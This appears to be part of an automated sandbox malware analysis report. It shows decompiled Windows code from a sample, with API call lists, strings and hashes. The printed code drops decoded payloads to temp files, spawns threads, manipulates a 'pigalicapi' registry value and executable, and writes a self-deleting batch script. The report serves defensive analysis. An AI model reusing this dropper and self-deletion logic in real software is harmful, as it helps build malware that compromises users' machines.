                                                                                                                                                                                                                                                                                                        				if(_v540 != 0xffffffff) {
                                                                                                                                                                                                                                                                                                        					_v2388 = 0;
                                                                                                                                                                                                                                                                                                        					WriteFile(_v540,  &_v2364, lstrlenA( &_v2364),  &_v2388, 0);
                                                                                                                                                                                                                                                                                                        					E04007D20(E04007D20(CloseHandle(_v540),  &_v2384, 0, 0x10),  &_v2460, 0, 0x44);
                                                                                                                                                                                                                                                                                                        					_v2460.cb = 0x44;
                                                                                                                                                                                                                                                                                                        					_v2460.dwFlags = _v2460.dwFlags | 0x00000001;
                                                                                                                                                                                                                                                                                                        					_v2460.wShowWindow = 0;
                                                                                                                                                                                                                                                                                                        					if(CreateProcessA(0,  &_v524, 0, 0, 0, 0, 0, 0,  &_v2460,  &_v2384) != 0) {
                                                                                                                                                                                                                                                                                                        						_t71 = CloseHandle(_v2384.hThread);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					ExitProcess(0);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _t71;
                                                                                                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                                                                                                        0x040074cd
                                                                                                                                                                                                                                                                                                        0x040074d2
                                                                                                                                                                                                                                                                                                        0x040074d5
                                                                                                                                                                                                                                                                                                        0x040074e4
                                                                                                                                                                                                                                                                                                        0x040074f3
                                                                                                                                                                                                                                                                                                        0x0400750b
                                                                                                                                                                                                                                                                                                        0x0400751e
                                                                                                                                                                                                                                                                                                        0x04007547
                                                                                                                                                                                                                                                                                                        0x04007520
                                                                                                                                                                                                                                                                                                        0x0400752e
                                                                                                                                                                                                                                                                                                        0x0400752e
                                                                                                                                                                                                                                                                                                        0x04007559
                                                                                                                                                                                                                                                                                                        0x0400756b
                                                                                                                                                                                                                                                                                                        0x0400757d
                                                                                                                                                                                                                                                                                                        0x040074f5
                                                                                                                                                                                                                                                                                                        0x04007503
                                                                                                                                                                                                                                                                                                        0x04007503
                                                                                                                                                                                                                                                                                                        0x0400758f
                                                                                                                                                                                                                                                                                                        0x040075b4
                                                                                                                                                                                                                                                                                                        0x040075ba
                                                                                                                                                                                                                                                                                                        0x040075c4
                                                                                                                                                                                                                                                                                                        0x040075c8
                                                                                                                                                                                                                                                                                                        0x040075ce
                                                                                                                                                                                                                                                                                                        0x040075ce
                                                                                                                                                                                                                                                                                                        0x040075d4
                                                                                                                                                                                                                                                                                                        0x040075de
                                                                                                                                                                                                                                                                                                        0x040075f1
                                                                                                                                                                                                                                                                                                        0x040075f3
                                                                                                                                                                                                                                                                                                        0x040075f3
                                                                                                                                                                                                                                                                                                        0x040075fd
                                                                                                                                                                                                                                                                                                        0x04007628
                                                                                                                                                                                                                                                                                                        0x04007636
                                                                                                                                                                                                                                                                                                        0x04007643
                                                                                                                                                                                                                                                                                                        0x04007643
                                                                                                                                                                                                                                                                                                        0x04007652
                                                                                                                                                                                                                                                                                                        0x04007656
                                                                                                                                                                                                                                                                                                        0x0400765b
                                                                                                                                                                                                                                                                                                        0x0400765b
                                                                                                                                                                                                                                                                                                        0x0400766f
                                                                                                                                                                                                                                                                                                        0x04007698
                                                                                                                                                                                                                                                                                                        0x040076aa
                                                                                                                                                                                                                                                                                                        0x040076c6
                                                                                                                                                                                                                                                                                                        0x040076cc
                                                                                                                                                                                                                                                                                                        0x040076d9
                                                                                                                                                                                                                                                                                                        0x040076df
                                                                                                                                                                                                                                                                                                        0x0400770e
                                                                                                                                                                                                                                                                                                        0x0400773f
                                                                                                                                                                                                                                                                                                        0x04007747
                                                                                                                                                                                                                                                                                                        0x0400775a
                                                                                                                                                                                                                                                                                                        0x04007762
                                                                                                                                                                                                                                                                                                        0x04007794
                                                                                                                                                                                                                                                                                                        0x0400779d
                                                                                                                                                                                                                                                                                                        0x0400779d
                                                                                                                                                                                                                                                                                                        0x040077a5
                                                                                                                                                                                                                                                                                                        0x040077a5
                                                                                                                                                                                                                                                                                                        0x040077ae

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 040074E4
                                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 04007503
                                                                                                                                                                                                                                                                                                        • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 0400752E
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,0400C650), ref: 04007559
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,pigalicapi), ref: 0400756B
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,.exe), ref: 0400757D
                                                                                                                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000080), ref: 0400758F
                                                                                                                                                                                                                                                                                                        • wnsprintfA.SHLWAPI ref: 040075B4
                                                                                                                                                                                                                                                                                                        • TerminateThread.KERNEL32(000002DC,00000001), ref: 040075CE
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,0400C690,00000000,00000002,00000000), ref: 04007620
                                                                                                                                                                                                                                                                                                        • RegDeleteValueA.ADVAPI32(00000000,pigalicapi), ref: 04007636
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 04007643
                                                                                                                                                                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 0400766F
                                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 0400767C
                                                                                                                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(?,slf,00000000), ref: 04007698
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,.bat), ref: 040076AA
                                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 040076C6
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000), ref: 040076F9
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(000000FF,?,00000000), ref: 0400770E
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 0400771B
                                                                                                                                                                                                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0400778C
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0400779D
                                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 040077A5
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$lstrcat$Close$CreateHandleNameProcess$AttributesCountDeleteDirectoryEnvironmentExitModuleOpenProfileSleepTempTerminateThreadTickUsersValueVariableWritelstrlenwnsprintf
                                                                                                                                                                                                                                                                                                        • String ID: .bat$.exe$:repeatdel %sif exist %s goto :repeatdel %%0$D$TEMP$USERPROFILE$pigalicapi$slf
                                                                                                                                                                                                                                                                                                        • API String ID: 3221898725-336785456
                                                                                                                                                                                                                                                                                                        • Opcode ID: fa5edaca191c21db1bfd21e4a2ba9e4dafc3ba9ee2ebd150ac9fab347fea4d6a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 33d1a80e31bd16fda39fb1d5e61c33b6d2d8e7faa3bd40571536c86a9d597677
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa5edaca191c21db1bfd21e4a2ba9e4dafc3ba9ee2ebd150ac9fab347fea4d6a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 277134B1A44318ABF7649F60DC49FEA7778EB44705F448698B209B60C1DBBCAA84CF51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                                        			E04006DA0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                        				intOrPtr* _v8;
                                                                                                                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v40;
                                                                                                                                                                                                                                                                                                        				long _v44;
                                                                                                                                                                                                                                                                                                        				void* _v48;
                                                                                                                                                                                                                                                                                                        				void* _v52;
                                                                                                                                                                                                                                                                                                        				void* _v56;
                                                                                                                                                                                                                                                                                                        				char _v324;
                                                                                                                                                                                                                                                                                                        				void* _v328;
                                                                                                                                                                                                                                                                                                        				char _v340;
                                                                                                                                                                                                                                                                                                        				char _v604;
                                                                                                                                                                                                                                                                                                        				long _v608;
                                                                                                                                                                                                                                                                                                        				int _v612;
                                                                                                                                                                                                                                                                                                        				long _v616;
                                                                                                                                                                                                                                                                                                        				void* _v620;
                                                                                                                                                                                                                                                                                                        				long _v624;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v628;
                                                                                                                                                                                                                                                                                                        				void* _v632;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t198;
                                                                                                                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t217;
                                                                                                                                                                                                                                                                                                        				void* _t223;
                                                                                                                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t248;
                                                                                                                                                                                                                                                                                                        				void* _t347;
                                                                                                                                                                                                                                                                                                        				void* _t349;
                                                                                                                                                                                                                                                                                                        				void* _t350;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = _a4;
                                                                                                                                                                                                                                                                                                        				if(_v8 == 0) {
                                                                                                                                                                                                                                                                                                        					L39:
                                                                                                                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				Sleep( *(_v8 + 0x14) * 0x3c * 0x3e8);
                                                                                                                                                                                                                                                                                                        				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                                                        				_v32 =  *_v8;
                                                                                                                                                                                                                                                                                                        				_v28 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                                                                                                                                                                        				_v24 =  *((intOrPtr*)(_v8 + 8));
                                                                                                                                                                                                                                                                                                        				_v12 =  *(_v8 + 0x14);
                                                                                                                                                                                                                                                                                                        				_v20 =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                                                        				_v16 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                                                                                                                                                        				if(( *(_v8 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                                        					GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                                                                        					E04007D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                                                        					E04009730( &_v340, 4);
                                                                                                                                                                                                                                                                                                        					_t349 = _t347 + 0x14;
                                                                                                                                                                                                                                                                                                        					GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                                                        					_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                                                        					if(_v328 != 0xffffffff) {
                                                                                                                                                                                                                                                                                                        						_v608 = 0;
                                                                                                                                                                                                                                                                                                        						_v612 = 0;
                                                                                                                                                                                                                                                                                                        						_v616 =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                                                        						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                                        							_v612 = WriteFile(_v328,  *(_v8 + 0x18),  *(_v8 + 0x1c),  &_v608, 0);
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_v624 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                                                        							_v620 = VirtualAlloc(0, _v624, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        							if(_v620 != 0) {
                                                                                                                                                                                                                                                                                                        								if(E04006260(_v8,  *(_v8 + 0x18),  *(_v8 + 0x1c), _v620, _v624) == _v624) {
                                                                                                                                                                                                                                                                                                        									_v612 = WriteFile(_v328, _v620, _v624,  &_v608, 0);
                                                                                                                                                                                                                                                                                                        									_v616 = _v624;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								VirtualFree(_v620, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						CloseHandle(_v328);
                                                                                                                                                                                                                                                                                                        						if(_v612 != 0 && _v608 == _v616) {
                                                                                                                                                                                                                                                                                                        							_t198 = E04001E60( &_v324);
                                                                                                                                                                                                                                                                                                        							_t350 = _t349 + 4;
                                                                                                                                                                                                                                                                                                        							_v628 = _t198;
                                                                                                                                                                                                                                                                                                        							if(_v628 != 0) {
                                                                                                                                                                                                                                                                                                        								if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                                                        									E040073C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                                                        									_t350 = _t350 + 0xc;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                        									E04002510(_v628, 0x400e290);
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L38:
                                                                                                                                                                                                                                                                                                        					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                                                        					goto L39;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v40 = 0;
                                                                                                                                                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                                                                                                                                                        				_v44 = 0;
                                                                                                                                                                                                                                                                                                        				if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                                        					_t217 = E04002070( *(_v8 + 0x18));
                                                                                                                                                                                                                                                                                                        					_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                                                        					_v40 = _t217;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v44 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                                                        					_v48 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        					if(_v48 != 0) {
                                                                                                                                                                                                                                                                                                        						if(E04006260( *(_v8 + 0x1c),  *(_v8 + 0x18),  *(_v8 + 0x1c), _v48, _v44) == _v44) {
                                                                                                                                                                                                                                                                                                        							_t248 = E04002070(_v48);
                                                                                                                                                                                                                                                                                                        							_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                                                        							_v40 = _t248;
                                                                                                                                                                                                                                                                                                        							if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                                        								_v36 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        								E04007B70(_v36, _v48, _v44);
                                                                                                                                                                                                                                                                                                        								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						VirtualFree(_v48, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if(_v40 == 0) {
                                                                                                                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                                                                                                                        					goto L38;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                                                        						E040073C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                                                        						_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                                        						_t223 = E040097A0(0x10);
                                                                                                                                                                                                                                                                                                        						_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                                                        						_v632 = _t223;
                                                                                                                                                                                                                                                                                                        						_v52 = _v632;
                                                                                                                                                                                                                                                                                                        						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                                        							 *_v52 = VirtualAlloc(0,  *(_v8 + 0x1c), 0x3000, 4);
                                                                                                                                                                                                                                                                                                        							if( *_v52 != 0) {
                                                                                                                                                                                                                                                                                                        								E04007B70( *_v52,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                                                        								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                                                        								 *(_v52 + 4) =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							 *_v52 = _v36;
                                                                                                                                                                                                                                                                                                        							 *(_v52 + 4) = _v44;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if( *_v52 != 0) {
                                                                                                                                                                                                                                                                                                        							 *(_v52 + 8) =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_v52 + 0xc)) = _v40;
                                                                                                                                                                                                                                                                                                        							_v56 = CreateThread(0, 0, E040077B0, _v52, 0, 0);
                                                                                                                                                                                                                                                                                                        							CloseHandle(_v56);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                        						E04002510(_v40, 0x400e290);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}


































                                                                                                                                                                                                                                                                                                        0x04006dac
                                                                                                                                                                                                                                                                                                        0x04006db3
                                                                                                                                                                                                                                                                                                        0x0400723f
                                                                                                                                                                                                                                                                                                        0x04007244
                                                                                                                                                                                                                                                                                                        0x04007244
                                                                                                                                                                                                                                                                                                        0x04006dc9
                                                                                                                                                                                                                                                                                                        0x04006dd1
                                                                                                                                                                                                                                                                                                        0x04006ddc
                                                                                                                                                                                                                                                                                                        0x04006de5
                                                                                                                                                                                                                                                                                                        0x04006dee
                                                                                                                                                                                                                                                                                                        0x04006df7
                                                                                                                                                                                                                                                                                                        0x04006e00
                                                                                                                                                                                                                                                                                                        0x04006e09
                                                                                                                                                                                                                                                                                                        0x04006e15
                                                                                                                                                                                                                                                                                                        0x04007028
                                                                                                                                                                                                                                                                                                        0x04007039
                                                                                                                                                                                                                                                                                                        0x0400704a
                                                                                                                                                                                                                                                                                                        0x0400704f
                                                                                                                                                                                                                                                                                                        0x04007077
                                                                                                                                                                                                                                                                                                        0x04007099
                                                                                                                                                                                                                                                                                                        0x040070a6
                                                                                                                                                                                                                                                                                                        0x040070ac
                                                                                                                                                                                                                                                                                                        0x040070b6
                                                                                                                                                                                                                                                                                                        0x040070c6
                                                                                                                                                                                                                                                                                                        0x040070d5
                                                                                                                                                                                                                                                                                                        0x040071af
                                                                                                                                                                                                                                                                                                        0x040070db
                                                                                                                                                                                                                                                                                                        0x040070eb
                                                                                                                                                                                                                                                                                                        0x04007107
                                                                                                                                                                                                                                                                                                        0x04007114
                                                                                                                                                                                                                                                                                                        0x0400713d
                                                                                                                                                                                                                                                                                                        0x04007163
                                                                                                                                                                                                                                                                                                        0x0400716f
                                                                                                                                                                                                                                                                                                        0x0400716f
                                                                                                                                                                                                                                                                                                        0x04007183
                                                                                                                                                                                                                                                                                                        0x04007183
                                                                                                                                                                                                                                                                                                        0x04007189
                                                                                                                                                                                                                                                                                                        0x040071bc
                                                                                                                                                                                                                                                                                                        0x040071c9
                                                                                                                                                                                                                                                                                                        0x040071e0
                                                                                                                                                                                                                                                                                                        0x040071e5
                                                                                                                                                                                                                                                                                                        0x040071e8
                                                                                                                                                                                                                                                                                                        0x040071f5
                                                                                                                                                                                                                                                                                                        0x040071fe
                                                                                                                                                                                                                                                                                                        0x04007212
                                                                                                                                                                                                                                                                                                        0x04007217
                                                                                                                                                                                                                                                                                                        0x04007217
                                                                                                                                                                                                                                                                                                        0x04007223
                                                                                                                                                                                                                                                                                                        0x04007231
                                                                                                                                                                                                                                                                                                        0x04007236
                                                                                                                                                                                                                                                                                                        0x04007223
                                                                                                                                                                                                                                                                                                        0x040071f5
                                                                                                                                                                                                                                                                                                        0x040071c9
                                                                                                                                                                                                                                                                                                        0x04007239
                                                                                                                                                                                                                                                                                                        0x04007239
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04007239
                                                                                                                                                                                                                                                                                                        0x04006e1b
                                                                                                                                                                                                                                                                                                        0x04006e22
                                                                                                                                                                                                                                                                                                        0x04006e29
                                                                                                                                                                                                                                                                                                        0x04006e39
                                                                                                                                                                                                                                                                                                        0x04006eec
                                                                                                                                                                                                                                                                                                        0x04006ef1
                                                                                                                                                                                                                                                                                                        0x04006ef4
                                                                                                                                                                                                                                                                                                        0x04006e3f
                                                                                                                                                                                                                                                                                                        0x04006e4f
                                                                                                                                                                                                                                                                                                        0x04006e65
                                                                                                                                                                                                                                                                                                        0x04006e6c
                                                                                                                                                                                                                                                                                                        0x04006e8c
                                                                                                                                                                                                                                                                                                        0x04006e92
                                                                                                                                                                                                                                                                                                        0x04006e97
                                                                                                                                                                                                                                                                                                        0x04006e9a
                                                                                                                                                                                                                                                                                                        0x04006ea6
                                                                                                                                                                                                                                                                                                        0x04006ebb
                                                                                                                                                                                                                                                                                                        0x04006eca
                                                                                                                                                                                                                                                                                                        0x04006ecf
                                                                                                                                                                                                                                                                                                        0x04006ecf
                                                                                                                                                                                                                                                                                                        0x04006ea6
                                                                                                                                                                                                                                                                                                        0x04006edd
                                                                                                                                                                                                                                                                                                        0x04006edd
                                                                                                                                                                                                                                                                                                        0x04006ee3
                                                                                                                                                                                                                                                                                                        0x04006efb
                                                                                                                                                                                                                                                                                                        0x04007012
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04006f01
                                                                                                                                                                                                                                                                                                        0x04006f08
                                                                                                                                                                                                                                                                                                        0x04006f1c
                                                                                                                                                                                                                                                                                                        0x04006f21
                                                                                                                                                                                                                                                                                                        0x04006f21
                                                                                                                                                                                                                                                                                                        0x04006f2d
                                                                                                                                                                                                                                                                                                        0x04006f35
                                                                                                                                                                                                                                                                                                        0x04006f3a
                                                                                                                                                                                                                                                                                                        0x04006f3d
                                                                                                                                                                                                                                                                                                        0x04006f49
                                                                                                                                                                                                                                                                                                        0x04006f55
                                                                                                                                                                                                                                                                                                        0x04006f83
                                                                                                                                                                                                                                                                                                        0x04006f8b
                                                                                                                                                                                                                                                                                                        0x04006fa1
                                                                                                                                                                                                                                                                                                        0x04006fa6
                                                                                                                                                                                                                                                                                                        0x04006fb2
                                                                                                                                                                                                                                                                                                        0x04006fb2
                                                                                                                                                                                                                                                                                                        0x04006f57
                                                                                                                                                                                                                                                                                                        0x04006f5d
                                                                                                                                                                                                                                                                                                        0x04006f65
                                                                                                                                                                                                                                                                                                        0x04006f65
                                                                                                                                                                                                                                                                                                        0x04006fbb
                                                                                                                                                                                                                                                                                                        0x04006fc6
                                                                                                                                                                                                                                                                                                        0x04006fcf
                                                                                                                                                                                                                                                                                                        0x04006fe9
                                                                                                                                                                                                                                                                                                        0x04006ff0
                                                                                                                                                                                                                                                                                                        0x04006ff0
                                                                                                                                                                                                                                                                                                        0x04006fbb
                                                                                                                                                                                                                                                                                                        0x04006fff
                                                                                                                                                                                                                                                                                                        0x0400700a
                                                                                                                                                                                                                                                                                                        0x0400700f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04006fff

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 04006DC9
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 04006DD1
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04006E5F
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000), ref: 04006EB5
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,00000000), ref: 04006EDD
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04006F7A
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 04006FE3
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 04006FF0
                                                                                                                                                                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 04007028
                                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 04007059
                                                                                                                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(?,?,00000000), ref: 04007077
                                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 04007093
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04007101
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0400715D
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 04007183
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 040071A9
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 040071BC
                                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 04007239
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Virtual$AllocFile$CloseCreateFreeHandleWrite$CountEnvironmentInitializeNameSleepTempThreadTickUninitializeVariable
                                                                                                                                                                                                                                                                                                        • String ID: TEMP
                                                                                                                                                                                                                                                                                                        • API String ID: 3110491842-1036413054
                                                                                                                                                                                                                                                                                                        • Opcode ID: 05801680803462ba2d4cfcd211f126ae5d7fafa0105253d93b0c039220193637
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2b87ebad86062e1f9aa8347128cf2fe592da7145f1ccd4accac7794ca236a0a8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05801680803462ba2d4cfcd211f126ae5d7fafa0105253d93b0c039220193637
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1FF10975A00208EFEB58DF94D984F9DB7B5BB88304F248698E509BB390D775AE81CF50
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04002900(char* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                                                                                                                        				CHAR* _v28;
                                                                                                                                                                                                                                                                                                        				char _v292;
